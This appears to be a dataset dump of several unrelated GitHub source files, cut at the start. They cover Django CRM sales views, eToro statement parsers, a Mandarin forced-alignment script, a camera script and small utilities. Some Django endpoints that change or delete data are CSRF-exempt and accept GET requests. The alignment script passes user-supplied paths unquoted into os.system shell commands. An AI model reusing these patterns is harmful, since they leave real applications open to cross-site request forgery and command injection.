django.views.decorators.clickjacking import xframe_options_exempt\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.decorators.http import require_GET\n\nfrom customer.models import Customer, LinkMan\nfrom sales.models import SaleChance, CusDevPlan\nfrom system.models import TUser\n\n\n@xframe_options_exempt\n@require_GET\ndef sales_index(request):\n \"\"\"跳转营销管理首页\"\"\"\n return render(request, 'sales/sale_chance.html')\n\n\n@require_GET\ndef select_sale_chance_list(request):\n try:\n page_num = request.GET.get('page') # 页号\n page_size = request.GET.get('limit') # 页容量\n\n state = request.GET.get('state')\n # 客户名称\n customerName = request.GET.get('customerName')\n # 创建人\n createMan = request.GET.get('createMan')\n # 开发状态(客户开发计划使用)\n devResult = request.GET.get('devResult')\n\n if customerName:\n users = SaleChance.objects.filter(isValid=1, customerName=customerName).values()\n elif createMan:\n users = SaleChance.objects.filter(isValid=1, createMan=createMan).values()\n elif state:\n users = SaleChance.objects.filter(isValid=1, state=state).values()\n elif devResult:\n users = SaleChance.objects.filter(isValid=1, devResult=devResult).values()\n else:\n users = SaleChance.objects.filter(isValid=1).values()\n\n paginator = Paginator(users, page_size)\n users_list = paginator.page(page_num).object_list\n\n context = {\n 'code': 0,\n 'msg': '',\n 'count': len(users),\n 'data': list(users_list)\n }\n\n return JsonResponse(context)\n\n except Exception as e:\n return JsonResponse({'code': 400, 'msg': 'error'})\n\n\n@xframe_options_exempt\n@require_GET\ndef create_or_update_sales(request):\n \"\"\"跳转添加/修改营销机会页面\"\"\"\n # 获取营销机会主键\n saleChanceId = request.GET.get('saleChanceId')\n context = None\n if saleChanceId:\n # 根据营销机会主键查询\n sc = SaleChance.objects.get(pk=saleChanceId)\n context = {'sc': sc}\n return render(request, 'sales/add_update.html', context)\n\n\n@require_GET\ndef select_customer(request):\n \"\"\"查询客户\"\"\"\n customer = Customer.objects.values(\"id\", 'name') \\\n .filter(isValid=1).order_by('-id').all()\n return JsonResponse(list(customer), safe=False)\n\n\n@csrf_exempt\n@require_GET\ndef create_sale_chance(request):\n \"\"\"添加营销机会和联系人\"\"\"\n try:\n # 接收参数\n customerId = request.GET.get('customer')\n customerName = request.GET.get('customerName')\n chanceSource = request.GET.get('chanceSource')\n linkMan = request.GET.get('linkMan')\n linkPhone = request.GET.get('linkPhone')\n cgjl = request.GET.get('cgjl')\n overview = request.GET.get('overview')\n description = request.GET.get('description')\n assignMan = request.GET.get('assignMan')\n # 如果有联系人还要添加联系人表数据\n if linkMan:\n lm = LinkMan(cusId=customerId, linkName=linkMan, phone=linkPhone)\n lm.save()\n # 如果有分配人,添加分配时间,分配状态为已分配\n if assignMan != '0':\n sc = SaleChance(customerId=customerId, customerName=customerName,\n chanceSource=chanceSource, linkMan=linkMan,\n linkPhone=linkPhone,\n cgjl=cgjl, overview=overview, description=description,\n assignMan=assignMan, assignTime=datetime.now(), state=1,\n devResult=0,\n createMan=request.session.get('user')['username'])\n else:\n sc = SaleChance(customerId=customerId, customerName=customerName,\n chanceSource=chanceSource, linkMan=linkMan,\n linkPhone=linkPhone,\n cgjl=cgjl, overview=overview, description=description,\n state=0, devResult=0,\n createMan=request.session.get('user')['username'])\n # 插入数据\n sc.save()\n # 返回提示信息\n return JsonResponse({'code': 200, 'msg': '添加成功'})\n except Exception as e:\n return JsonResponse({'code': 400, 'msg': 
'添加失败'})\n\n\n@csrf_exempt\n@require_GET\ndef update_sale_chance(request):\n \"\"\"修改营销机会和联系人\"\"\"\n try:\n # 接收参数\n id = request.GET.get('id')\n customerId = request.GET.get('customer')\n customerName = request.GET.get('customerName')\n chanceSource = request.GET.get('chanceSource')\n linkMan = request.GET.get('linkMan')\n linkPhone = request.GET.get('linkPhone')\n cgjl = request.GET.get('cgjl')\n overview = request.GET.get('overview')\n description = request.GET.get('description')\n assignMan = request.GET.get('assignMan')\n # 根据主键查询营销机会\n sc = SaleChance.objects.get(pk=id)\n # 如果有联系人还要修改联系人表数据\n if linkMan != sc.linkMan:\n LinkMan.objects.filter(cusId=customerId) \\\n .update(linkName=linkMan, phone=linkPhone, updateDate=datetime.now())\n # 如果用户取消了分配人,要改变分配状态为未分配\n if assignMan == '0':\n sc.state = 0\n sc.assignMan = None\n sc.assignTime = None\n else:\n sc.state = 1\n sc.assignMan = assignMan\n sc.assignTime = datetime.now()\n # 重新赋值\n sc.customerId = customerId\n sc.customerName = customerName\n sc.chanceSource = chanceSource\n sc.linkMan = linkMan\n sc.linkPhone = linkPhone\n sc.cgjl = cgjl\n sc.overview = overview\n sc.description = description\n sc.updateDate = datetime.now()\n # 保存\n sc.save()\n # 返回提示信息\n return JsonResponse({'code': 200, 'msg': '修改成功'})\n except Exception as e:\n return JsonResponse({'code': 400, 'msg': '修改失败'})\n\n\n@csrf_exempt\n@require_GET\ndef delete_sale_chance(request):\n \"\"\"删除营销机会\"\"\"\n try:\n # 接收参数\n ids = request.GET.get('ids')\n id_list = list(map(int, ids.split(\",\")))\n SaleChance.objects.filter(pk__in=id_list).delete()\n\n return JsonResponse({'code': 200, 'msg': '删除成功'})\n except Exception as e:\n return JsonResponse({'code': 400, 'msg': '删除失败'})\n\n\n@xframe_options_exempt\n@require_GET\ndef cus_dev_plan_index(request):\n \"\"\"跳转营销机会管理首页\"\"\"\n return render(request, 'sales/cus_dev_plan.html')\n\n\n@xframe_options_exempt\n@require_GET\ndef cus_dev_plan_index_detail(request):\n \"\"\"跳转客户开发计划详情页\"\"\"\n # 接收参数\n saleChanceId = request.GET.get('saleChanceId')\n # 根据主键查询营销机会\n sc = SaleChance.objects.get(pk=saleChanceId)\n context = {'sc': sc}\n return render(request, 'sales/cus_dev_plan_detail.html', context)\n\n\n@require_GET\ndef select_cus_dev_plan_list(request):\n \"\"\"查询客户开发计划详细列表\"\"\"\n try:\n # 获取第几页\n page_num = request.GET.get('page', 1)\n # 获取每页多少条\n page_size = request.GET.get('limit', 10)\n # 获取客户营销机会主键\n saleChanceId = request.GET.get('saleChanceId')\n # 查询\n cdp_list = CusDevPlan.objects.extra(select={'planDate': 'date_format(plan_date, \"%%Y-%%m-%%d\")'}) \\\n .values('id', 'planItem', 'planDate', 'exeAffect', 'saleChance') \\\n .filter(saleChance=saleChanceId).order_by('-id')\n # 初始化分页对象\n p = Paginator(cdp_list, page_size)\n # 获取指定页数的数据\n data = p.page(page_num).object_list\n # 返回总条数\n count = p.count\n # 返回数据,按照 layuimini 要求格式构建\n context = {\n 'code': 0,\n 'msg': '',\n 'count': count,\n 'data': list(data)\n }\n return JsonResponse(context)\n except Exception as e:\n return JsonResponse({'code': 400, 'msg': 'error'})\n\n\n@xframe_options_exempt\n@require_GET\ndef create_or_update_cus_dev_plan(request):\n \"\"\"跳转客户开发计划添加/修改页面\"\"\"\n # 获取营销机会主键\n saleChanceId = request.GET.get('saleChanceId')\n # 获取客户开发计划主键\n id = request.GET.get('id')\n context = {'saleChanceId': saleChanceId}\n if id:\n cusDevPlan = CusDevPlan.objects.get(pk=id)\n context['cusDevPlan'] = cusDevPlan\n return render(request, 'sales/cus_dev_plan_add_update.html', context)\n\n\n@csrf_exempt\n@require_GET\ndef create_cus_dev_plan(request):\n 
\"\"\"添加客户开发计划\"\"\"\n # 接收参数\n data = request.GET.dict()\n # 弹出营销机会主键\n saleChanceId = data.pop('saleChanceId')\n # 删除主键\n del data['id']\n # 获取营销机会对象\n sc = SaleChance.objects.get(pk=saleChanceId)\n data['saleChance'] = sc\n # 添加客户开发计划\n CusDevPlan.objects.create(**data)\n # 修改营销机会的开发状态为开发中\n sc.devResult = 1\n sc.updateDate = datetime.now()\n sc.save()\n return JsonResponse({'code': 200, 'msg': '添加成功'})\n\n\n@csrf_exempt\n@require_GET\ndef update_cus_dev_plan(request):\n \"\"\"修改客户开发计划\"\"\"\n # 接收参数\n data = request.GET.dict()\n # 弹出营销机会主键\n saleChanceId = data.pop('saleChanceId')\n # 删除主键\n id = data.pop('id')\n # 修改时间\n data['updateDate'] = datetime.now()\n # 修改客户开发计划\n CusDevPlan.objects.filter(pk=id).update(**data)\n return JsonResponse({'code': 200, 'msg': '修改成功'})\n\n\n@csrf_exempt\n@require_GET\ndef delete_cus_dev_plan(request):\n \"\"\"删除客户开发计划\"\"\"\n # 获取主键\n id = request.GET.get('id')\n # 逻辑删除客户开发计划\n CusDevPlan.objects.filter(pk=id).update(isValid=0, updateDate=datetime.now())\n return JsonResponse({'code': 200, 'msg': '删除成功'})\n\n\n@csrf_exempt\n@require_GET\ndef update_dev_result(request):\n \"\"\"开发成功或者开发失败\"\"\"\n # 接收参数\n saleChanceId = request.GET.get('saleChanceId')\n devResult = request.GET.get('devResult')\n SaleChance.objects.filter(pk=saleChanceId).update(devResult=devResult,\n updateDate=datetime.now())\n return JsonResponse({'code': 200, 'msg': '操作成功'})\n","repo_name":"GuardHer/Django_CRM_System","sub_path":"sales/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"1969714434","text":"#! /usr/bin/env python\n\"\"\"Load a shot and visualize it\n\nIf you don't have a shot to load, you could run\n\npython break.py --no-viz --save a_shot.msgpack\n\nto solve that problem.\n\"\"\"\n\nimport pooltool as pt\n\n\ndef main(args):\n interface = pt.ShotViewer()\n interface.show(pt.System.load(args.path))\n\n\nif __name__ == \"__main__\":\n import argparse\n\n ap = argparse.ArgumentParser()\n ap.add_argument(\"--path\", type=str, required=True, help=\"Filepath of the shot\")\n\n args = ap.parse_args()\n main(args)\n","repo_name":"ekiefl/pooltool","sub_path":"sandbox/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"83"} +{"seq_id":"29366237164","text":"'''py.test hooks for streamcorpus-pipeline.'''\nfrom __future__ import absolute_import\nimport os\nimport sys\n\ntry:\n import sysconfig\nexcept ImportError:\n sysconfig = None\n\nimport pytest\n\n\n@pytest.fixture\ndef test_data_dir(request):\n # Determine directory where this file lives and return\n # different paths depending on whether or not this\n # conftest.py file has been installed\n cur_directory_path = os.path.abspath(os.path.dirname(__file__))\n\n if cur_directory_path.startswith(os.path.abspath(sys.prefix)):\n # Running from an installed location\n data_path = None\n if sysconfig is not None:\n data_path = sysconfig.get_path('data')\n if not os.path.exists(os.path.join(data_path, 'data')):\n data_path = sysconfig.get_path('data', scheme='posix_prefix')\n if data_path is None:\n data_path = sys.prefix\n\n path = os.path.join(data_path,\n 'data/streamcorpus-pipeline')\n else:\n # Running not installed\n path = os.path.abspath(os.path.join(os.path.dirname(__file__),\n '../../data'))\n return 
path\n","repo_name":"trec-kba/streamcorpus-pipeline","sub_path":"streamcorpus_pipeline/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"83"} +{"seq_id":"2085177215","text":"# 주사위 https://www.acmicpc.net/problem/1233\n\ns1, s2, s3 = map(int, input().split())\n\ntotal = [0] * (s1 + s2 + s3 + 1)\n\nfor i in range(1, s1+1):\n for j in range(1, s2+1):\n for k in range(1, s3+1):\n total[i+j+k] += 1\nfor i in range(len(total)):\n if total[i] == max(total):\n print(i) # 배열의 인덱스가 정답이 된다.\n break\n\n# 최대 빈도수가 같으면 더 작은 값을 반환하는 것이 포인트이다.\n","repo_name":"TUKF4-CodingTestStudy/jaehyeok","sub_path":"chap01/Q1233.py","file_name":"Q1233.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"13066612637","text":"#!/usr/bin/python\n# adapted from Jiahong Yuan by Chenzi Xu in Dec 2019\n\n\"\"\" Usage:\n Calign.py [options] wavfile trsfile output_file\n where options may include:\n -r sampling_rate -- override which sampling rate model to use, either 8000 or 16000\n -a user_supplied_dictionary -- encoded in utf8, the dictionary will be combined with the dictionary in the model\n -d user_supplied_dictionary -- encoded in utf8, the dictionary will be used alone, NOT combined with the dictionary in the model\n -p punctuations -- encoded in utf8, punctuations and other symbols in this file will be deleted in forced alignment, the default is to use \"puncs\" in the model\nsoundfile requirements: mono 16,000Hz 16bits\n\"\"\"\n\nimport os\nimport sys\nimport getopt\nimport wave\nimport codecs\nimport io\n\nHOMEDIR = '/Users/xuchenzi/Documents/phonetics/P2FA_Mandarin/run'\nMODEL_DIR = HOMEDIR + '/model'\n\nmissing = io.open('MissingWords', 'w', encoding='utf8')\n\n\ndef prep_mlf(trsfile, tmpbase):\n\n f = codecs.open(tmpbase + '.dict', 'r', 'utf-8')\n lines = f.readlines()\n f.close()\n dict = []\n for line in lines:\n dict.append(line.split()[0])\n f = codecs.open(tmpbase + '.puncs', 'r', 'utf-8')\n lines = f.readlines()\n f.close()\n puncs = []\n for line in lines:\n puncs.append(line.strip())\n\n f = codecs.open(trsfile, 'r', 'utf-8')\n lines = f.readlines()\n f.close()\n\n fw = codecs.open(tmpbase + '.mlf', 'w', 'utf-8')\n fw.write('#!MLF!#\\n')\n fw.write('\"' + tmpbase + '.lab\"\\n')\n fw.write('sp\\n')\n i = 0\n unks = set()\n while (i < len(lines)):\n txt = lines[i].replace('\\n', '')\n txt = txt.replace('{breath}', 'br').replace('{noise}', 'ns')\n txt = txt.replace('{laugh}', 'lg').replace('{laughter}', 'lg')\n txt = txt.replace('{cough}', 'cg').replace('{lipsmack}', 'ls')\n for pun in puncs:\n txt = txt.replace(pun, '')\n for wrd in txt.split():\n if (wrd in dict):\n fw.write(wrd + '\\n')\n fw.write('sp\\n')\n else:\n unks.add(wrd)\n i += 1\n fw.write('.\\n')\n fw.close()\n return unks\n\n\ndef gen_res(infile1, infile2, outfile):\n\n f = codecs.open(infile1, 'r', 'utf-8')\n lines = f.readlines()\n f.close()\n\n f = codecs.open(infile2, 'r', 'utf-8')\n lines2 = f.readlines()\n f.close()\n words = []\n for line in lines2[2:-1]:\n if (line.strip() != 'sp'):\n words.append(line.strip())\n words.reverse()\n\n fw = codecs.open(outfile, 'w', 'utf-8')\n fw.write(lines[0])\n fw.write(lines[1])\n for line in lines[2:-1]:\n if ((line.split()[-1].strip() == 'sp') or (len(line.split()) != 5)):\n fw.write(line)\n else:\n fw.write(line.split()[0] + ' ' + line.split()[1] + ' ' + line.split()\n 
[2] + ' ' + line.split()[3] + ' ' + words.pop() + '\\n')\n    fw.write(lines[-1])\n\n\ndef getopt2(name, opts, default=None):\n    value = [v for n, v in opts if n == name]\n    if len(value) == 0:\n        return default\n    return value[0]\n\n\ndef readAlignedMLF(mlffile, SR, wave_start):\n    # This reads an MLF alignment output file with phone and word\n    # alignments and returns a list of words, each word is a list containing\n    # the word label followed by the phones, each phone is a tuple\n    # (phone, start_time, end_time) with times in seconds.\n\n    # f = codecs.open(mlffile, 'r', 'utf-8')\n    with codecs.open(mlffile, 'r', 'utf-8') as f:\n        lines = [l.rstrip() for l in f.readlines()]\n    f.close()\n\n    if len(lines) < 3:\n        raise ValueError(\"Alignment did not complete successfully.\")\n\n    j = 2\n    ret = []\n    while (lines[j] != '.'):\n        if (len(lines[j].split()) == 5):\n            # Is this the start of a word; do we have a word label?\n            # Make a new word list in ret and put the word label at the beginning\n            wrd = lines[j].split()[4]\n            ret.append([wrd])\n\n        # Append this phone to the latest word (sub-)list\n        ph = lines[j].split()[2]\n        if (SR == 11025):\n            st = (float(lines[j].split()[0])/10000000.0 + 0.0125)*(11000.0/11025.0)\n            en = (float(lines[j].split()[1])/10000000.0 + 0.0125)*(11000.0/11025.0)\n        else:\n            st = float(lines[j].split()[0])/10000000.0 + 0.0125\n            en = float(lines[j].split()[1])/10000000.0 + 0.0125\n        if st < en:\n            ret[-1].append([ph, st+wave_start, en+wave_start])\n\n        j += 1\n\n    return ret\n\n\ndef writeTextGrid(outfile, word_alignments):\n    # make the list of just phone alignments\n    phons = []\n    for wrd in word_alignments:\n        phons.extend(wrd[1:])  # skip the word label\n\n    # make the list of just word alignments\n    # we're getting elements of the form:\n    # [\"word label\", [\"phone1\", start, end], [\"phone2\", start, end], ...]\n    wrds = []\n    for wrd in word_alignments:\n        # If no phones make up this word, then it was an optional word\n        # like a pause that wasn't actually realized.\n        if len(wrd) == 1:\n            continue\n        # word label, first phone start time, last phone end time\n        wrds.append([wrd[0], wrd[1][1], wrd[-1][2]])\n\n    # write the phone interval tier\n    fw = open(outfile, 'w')\n    fw.write('File type = \"ooTextFile short\"\\n')\n    fw.write('\"TextGrid\"\\n')\n    fw.write('\\n')\n    fw.write(str(phons[0][1]) + '\\n')\n    fw.write(str(phons[-1][2]) + '\\n')\n    fw.write('<exists>\\n')\n    fw.write('2\\n')\n    fw.write('\"IntervalTier\"\\n')\n    fw.write('\"phone\"\\n')\n    fw.write(str(phons[0][1]) + '\\n')\n    fw.write(str(phons[-1][-1]) + '\\n')\n    fw.write(str(len(phons)) + '\\n')\n    for k in range(len(phons)):\n        fw.write(str(phons[k][1]) + '\\n')\n        fw.write(str(phons[k][2]) + '\\n')\n        fw.write('\"' + phons[k][0] + '\"' + '\\n')\n\n    # write the word interval tier\n    fw.write('\"IntervalTier\"\\n')\n    fw.write('\"word\"\\n')\n    fw.write(str(phons[0][1]) + '\\n')\n    fw.write(str(phons[-1][-1]) + '\\n')\n    fw.write(str(len(wrds)) + '\\n')\n    for k in range(len(wrds) - 1):\n        fw.write(str(wrds[k][1]) + '\\n')\n        fw.write(str(wrds[k+1][1]) + '\\n')\n        fw.write('\"' + wrds[k][0] + '\"' + '\\n')\n\n    fw.write(str(wrds[-1][1]) + '\\n')\n    fw.write(str(phons[-1][2]) + '\\n')\n    fw.write('\"' + wrds[-1][0] + '\"' + '\\n')\n\n    fw.close()\n\n\nif __name__ == '__main__':\n\n    try:\n        opts, args = getopt.getopt(sys.argv[1:], \"r:a:d:p:\")\n\n        # get the three mandatory arguments\n        wavfile, trsfile, outfile = args\n        # get options\n        sr_override = getopt2(\"-r\", opts)\n        dict_add = getopt2(\"-a\", opts)\n        dict_alone = getopt2(\"-d\", opts)\n        puncs = getopt2(\"-p\", opts)\n\n    
except:\n        print(__doc__)\n        sys.exit(0)\n\n    tmpbase = '/tmp/' + os.environ['USER'] + '_' + str(os.getpid())\n\n    # find sampling rate and prepare wavefile\n    if sr_override:\n        SR = int(sr_override)\n        os.system('sox ' + wavfile + ' -r ' + str(SR) + ' ' + tmpbase + '.wav')\n    else:\n        f = wave.open(wavfile, 'r')\n        SR = f.getframerate()\n        f.close()\n        if (SR not in [8000, 16000]):\n            os.system('sox ' + wavfile + ' -r 16000 ' + tmpbase + '.wav')\n            SR = 16000\n        else:\n            os.system('cp -f ' + wavfile + ' ' + tmpbase + '.wav')\n\n    # prepare plp file\n    os.system('HCopy -C ' + MODEL_DIR + '/' + str(SR) +\n              '/config ' + tmpbase + '.wav ' + tmpbase + '.plp')\n\n    # prepare mlf file and dictionary\n    if dict_alone:\n        f = codecs.open(dict_alone, 'r', 'utf-8')\n        lines = f.readlines()\n        f.close()\n        lines = lines + ['sp sp\\n']\n    else:\n        f = codecs.open(MODEL_DIR + '/dict', 'r', 'utf-8')\n        lines = f.readlines()\n        f.close()\n        if (dict_add):\n            f = codecs.open(dict_add, 'r', 'utf-8')\n            lines2 = f.readlines()\n            f.close()\n            lines = lines + lines2\n    fw = codecs.open(tmpbase + '.dict', 'w', 'utf-8')\n    for line in lines:\n        fw.write(line)\n\n    if puncs:\n        os.system('cp -f ' + puncs + ' ' + tmpbase + '.puncs')\n    else:\n        os.system('cp -f ' + MODEL_DIR + '/puncs ' + tmpbase + '.puncs')\n\n    unks = prep_mlf(trsfile, tmpbase)\n    for unk in unks:\n        missing.write('Missing: ' + unk + '\\n')\n\n    # run alignment\n    os.system('HVite -T 1 -a -m -t 10000.0 10000.0 100000.0 -I ' + tmpbase + '.mlf -H ' + MODEL_DIR + '/' + str(SR) + '/macros -H ' + MODEL_DIR + '/' +\n              str(SR) + '/hmmdefs -i ' + tmpbase + '.aligned' + ' ' + tmpbase + '.dict ' + MODEL_DIR + '/monophones ' + tmpbase + '.plp' + ' > ' + tmpbase + '.results')\n\n    gen_res(tmpbase + '.aligned', tmpbase + '.mlf', outfile)\n\n    #output_mlf = tmpbase + '.aligned'\n    wave_start = '0.0'\n\n    writeTextGrid(outfile, readAlignedMLF(outfile, SR, float(wave_start)))\n\n    # clean up\n    os.system('rm -f ' + tmpbase + '*')\n","repo_name":"chenchenzi/P2FA_Mandarin_py3","sub_path":"run/Calign2textgrid.py","file_name":"Calign2textgrid.py","file_ext":"py","file_size_in_byte":8949,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"83"}
+{"seq_id":"31795519748","text":"from typing import Dict, Tuple\n\nimport pandas as pd\n\nfrom finvestor.etoro.schemas import (\n    EtoroAccountStatement,\n    EtoroAccountSummary,\n    EtoroFinancialSummary,\n)\nfrom finvestor.etoro.utils import ETORO_DATETIME_FORMAT\nfrom finvestor.etoro.yf_mapping import ETORO_TO_YF_TICKER_MAPPING\n\n\ndef parse_etoro_account_statement(\n    etoro_account_statement_sheets: Dict[str, pd.DataFrame],\n) -> EtoroAccountStatement:\n    \"\"\"Parse the etoro account statement sheets loaded using pd.read_excel(...).\n\n    Args:\n        etoro_account_statement_sheets (Dict[str, pd.DataFrame]): Dict with sheets\n            as pandas dataframes, and sheet names as keys\n\n    Returns:\n        EtoroAccountStatement\n    \"\"\"\n\n    closed_positions_df = pre_process_closed_positions_df(\n        etoro_account_statement_sheets[\"Closed Positions\"]\n    )\n    (\n        fees_df,\n        deposits_df,\n        withdrawals_df,\n        account_activity_open_positions_df,\n        account_activity_closed_positions_df,\n    ) = pre_process_account_activity_df(\n        etoro_account_statement_sheets[\"Account Activity\"]\n    )\n\n    assert len(closed_positions_df) == len(\n        account_activity_closed_positions_df\n    ), \"Invalid or corrupt data.\"\n\n    all_closed = closed_positions_df.merge(\n        account_activity_closed_positions_df, on=\"position_id\"\n    )\n\n    transaction = account_activity_open_positions_df.merge(\n        
all_closed.drop(\n            columns=[\"amount\", \"date\", \"invested\", \"realized_equity\", \"open_date\"],\n            errors=\"ignore\",\n        ),\n        on=(\"position_id\", \"details\"),\n        how=\"left\",\n        suffixes=(\"_open\", \"_close\"),\n    )\n    transaction[[\"ticker\", \"currency\"]] = transaction[\"details\"].str.split(\n        \"/\", n=1, expand=True\n    )\n    transaction = transaction.drop(columns=[\"details\"], errors=\"ignore\")\n    ordered_columns = list(transaction.columns[-2:]) + list(transaction.columns[:-2])\n    transaction = transaction[ordered_columns]\n    transaction[\"position_id\"] = transaction[\"position_id\"].astype(\"int64\")\n    transaction[\"open_date\"] = pd.to_datetime(\n        transaction[\"open_date\"], format=ETORO_DATETIME_FORMAT, utc=True\n    )\n    transaction[\"close_date\"] = pd.to_datetime(\n        transaction[\"close_date\"], format=ETORO_DATETIME_FORMAT, utc=True\n    )\n\n    transaction[\"ticker\"] = transaction[\"ticker\"].replace(\n        to_replace=ETORO_TO_YF_TICKER_MAPPING\n    )\n\n    return EtoroAccountStatement(\n        account_summary=parse_account_summary(\n            etoro_account_statement_sheets[\"Account Summary\"]\n        ),\n        financial_summary=parse_financial_summary(\n            etoro_account_statement_sheets[\"Financial Summary\"]\n        ),\n        transactions=transaction,\n        fees=fees_df,\n        deposits=deposits_df,\n        withdrawals=withdrawals_df,\n    )\n\n\ndef parse_account_summary(df: pd.DataFrame) -> EtoroAccountSummary:\n    \"\"\"Parse the account summary object from pandas dataframe.\n\n    Args:\n        df: pandas dataframe of 'Account Summary' sheet loaded from etoro account\n            statement xlsx\n\n    Returns:\n        EtoroAccountSummary\n    \"\"\"\n    # apply some preprocessing\n    df = (\n        df.melt(id_vars=[\"Details\"])\n        .drop(\"variable\", axis=1)\n        .dropna()\n        .drop(df.index[[0, 8, 20]])\n    )\n    return EtoroAccountSummary(**dict(zip(df.Details, df.value)))\n\n\ndef parse_financial_summary(df: pd.DataFrame) -> EtoroFinancialSummary:\n    \"\"\"Load the financial summary object from pandas dataframe.\n\n    Args:\n        df: pandas dataframe of 'Financial Summary' sheet loaded from etoro account\n            statement xlsx\n\n    Returns:\n        EtoroFinancialSummary\n    \"\"\"\n    # apply some preprocessing\n    df = df.drop(\"Tax\\nRate\", axis=1).dropna()\n    return EtoroFinancialSummary(**dict(zip(df.Name, df[\"Amount\\nin USD\"])))\n\n\ndef pre_process_account_activity_df(\n    df: pd.DataFrame,\n) -> Tuple[pd.DataFrame, pd.DataFrame, pd.DataFrame, pd.DataFrame, pd.DataFrame]:\n    \"\"\"Pre-process the account activity sheet from etoro account statement.\n\n    -> Drop the column 'NWA', no information about it yet.\n    -> Transform column names to lower case and replace spaces with '_'\n    -> Split dataframe into:\n        - fees dataframe\n        - deposits dataframe\n        - withdrawals dataframe\n        - open positions dataframe\n        - closed positions dataframe\n    -> Convert all values of column 'type' to upper case (Buy -> BUY, Sell -> SELL)\n\n    Args:\n        df: The account activity dataframe.\n\n    Returns:\n        Tuple[fees_df, deposits_df, withdrawals_df, open_df, closed_df]\n    \"\"\"\n\n    # drop NWA column: not sure what it means :)\n    df = df.drop(columns=[\"NWA\"], errors=\"ignore\")\n    df.columns = df.columns.str.lower().str.replace(\" \", \"_\")\n\n    # extract all fees into a separate dataframe\n    fees_df = df[(df.type == \"Adjustment\") | (df.type == \"Rollover Fee\")]\n\n    deposits_df = df[df.type == \"Deposit\"]\n    deposits_df = deposits_df.drop(columns=[\"type\", \"position_id\"], errors=\"ignore\")\n\n    withdrawals_df = df[\n        (df.type == \"Withdraw Fee\")\n        | (df.type == \"Withdraw Request\")\n        | (df.type == \"Withdraw Fee Cancelled\")\n        | (df.type == 
\"Withdraw Request Cancelled\")\n ]\n withdrawals_df = withdrawals_df.drop(\n columns=[\"details\", \"position_id\"], errors=\"ignore\"\n )\n\n open_df = df[df.type == \"Open Position\"]\n open_df = open_df.drop(columns=[\"type\", \"realized_equity_change\"], errors=\"ignore\")\n open_df = open_df.rename(columns={\"amount\": \"invested\", \"date\": \"open_date\"})\n\n closed_df = df[df.type == \"Profit/Loss of Trade\"]\n closed_df = closed_df.drop(columns=[\"type\"], errors=\"ignore\")\n return fees_df, deposits_df, withdrawals_df, open_df, closed_df\n\n\ndef pre_process_closed_positions_df(df: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Pre-process the closed positions sheet from etoro account statement.\n\n -> Split the 'Action' column into 'type' (Buy or Sell) and 'name'\n (full name of the company)\n -> Drop the columns: 'Copied From', 'Type', 'Notes', 'Action'\n -> Transform column names to lower string and replace spaces with '_'\n -> rename some columns:\n - stop_lose_rate: stop_loss_rate\n - amount: invested\n - isin: ISIN\n -> Convert all values of column 'type' to upper case (Buy -> BUY, Sell -> SELL)\n\n Args:\n df: The closed positions sheet as a pandas dataframe.\n\n Returns:\n pd.DataFrame\n \"\"\"\n # split string by first space, to get type of transacation (BUY/SELL) and\n # company name\n df[[\"type\", \"name\"]] = df[\"Action\"].str.split(\" \", n=1, expand=True)\n\n # drop unnecessary columns\n df = df.drop(columns=[\"Copied From\", \"Type\", \"Notes\", \"Action\"], errors=\"ignore\")\n\n # convert column names to lower case and replace spaces with '_'\n df.columns = df.columns.str.lower().str.replace(\" \", \"_\")\n\n # rename some columns to be clearer or fix typos\n df = df.rename(\n columns={\n \"stop_lose_rate\": \"stop_loss_rate\",\n \"amount\": \"invested\",\n \"isin\": \"ISIN\",\n }\n )\n\n # convert column 'type' to uper case (Buy -> BUY, Sell -> SELL)\n df[\"type\"] = df[\"type\"].str.upper()\n\n return df\n","repo_name":"obendidi/finvestor","sub_path":"finvestor/etoro/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":7203,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"17511740885","text":"import time\nimport picamera\nimport picamera.array\nfrom logging import getLogger, DEBUG, NullHandler\n\nlocal_logger = getLogger(__name__)\nlocal_logger.addHandler(NullHandler())\nlocal_logger.setLevel(DEBUG)\nlocal_logger.propagate = True\n\n\nclass Camera():\n def __init__(self, w=32, h=32, debug=False, logger=None):\n self.width = w\n self.height = h\n self.num = 0\n self.logger = logger or local_logger\n self.debug=debug\n self.save_img = True\n\n def setup(self):\n self.camera = picamera.PiCamera()\n self.camera.resolution = (self.width, self.height)\n #self.camera.exposure_mode = (\"night\")\n #self.camera.awb_mode = (\"shade\")\n if self.debug:\n #self.camera.start_preview()\n pass\n\n def captureImg(self):\n with picamera.array.PiRGBArray(self.camera) as stream:\n self.camera.capture(stream, 'bgr')\n image = stream.array\n if self.save_img:\n # save image \"img/djglass_cap_0001.jpg\"\n img_name = \"img/djglass_cap_\" + (\"0000\" + str(self.num))[-4:]+ \".jpg\"\n self.camera.capture(img_name)\n self.logger.debug(\"save image \"+ img_name)\n self.num += 1\n return image\n\n\ndef main():\n CAPTURE_WIDTH = 32\n CAPTURE_HEIGHT = 32\n camera = Camera(CAPTURE_WIDTH,CAPTURE_HEIGHT,debug=True)\n camera.setup()\n while True:\n img = camera.captureImg()\n time.sleep(1)\n\nif __name__ == 
'__main__':\n    main()\n","repo_name":"kobarius/DJglass","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
